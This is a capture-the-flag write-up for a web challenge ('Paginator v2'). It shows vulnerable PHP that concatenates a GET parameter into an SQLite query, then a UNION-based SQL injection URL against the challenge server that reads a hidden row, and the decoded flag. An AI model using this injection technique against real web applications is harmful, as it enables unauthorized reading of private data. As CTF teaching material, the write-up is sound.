This was just a very simple sqli challenge

Accessing the web page shows this

We can look at the source code

First we note that it creates a table `pages` with the column as `id, title, content`

```php
$db->exec("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT UNIQUE, content TEXT)");
```

Then on the very first row it inserts the flag

```php
$db->exec("INSERT INTO pages (title, content) VALUES ('Flag', '" . base64_encode($FLAG) . "')");
```

This is how it handles our input

```php
if(isset($_GET['p']) && str_contains($_GET['p'], ",")) {
[$min, $max] = explode(",",$_GET['p']);
if(intval($min) <= 1 ) {
die("This post is not accessible...");
}
try {
$q = "SELECT * FROM pages WHERE id >= $min AND id <= $max";
$result = $db->query($q);
while ($row = $result->fetchArray(SQLITE3_ASSOC)) {
echo $row['title'] . " (ID=". $row['id'] . ") has content: \"" . $row['content'] . "\"
";
}
}catch(Exception $e) {
echo "Try harder!";
}
} else {
echo "Try harder!";
}
```

It expects the get parameter `p` to be of format `int, int`, but it doesn't allow us to set `min` as `1` basically preventing us from accessing the first post

Then it directly uses our input on the query, leading to an SQL injection vulnerabiltiy

I simply just used a `UNION` operator to show the content of the flag

```
http://52.59.124.14:5012/?p=2,1 UNION SELECT * FROM pages WHERE id=1
```

The flag is base64 encoded so just decode it

```
Flag: ENO{SQL1_W1th_0uT_C0mm4_W0rks_SomeHow!}
```

Original writeup (https://github.com/h4ckyou/h4ckyou.github.io/blob/main/posts/ctf/nullcon25/writeup.md#paginator-v2).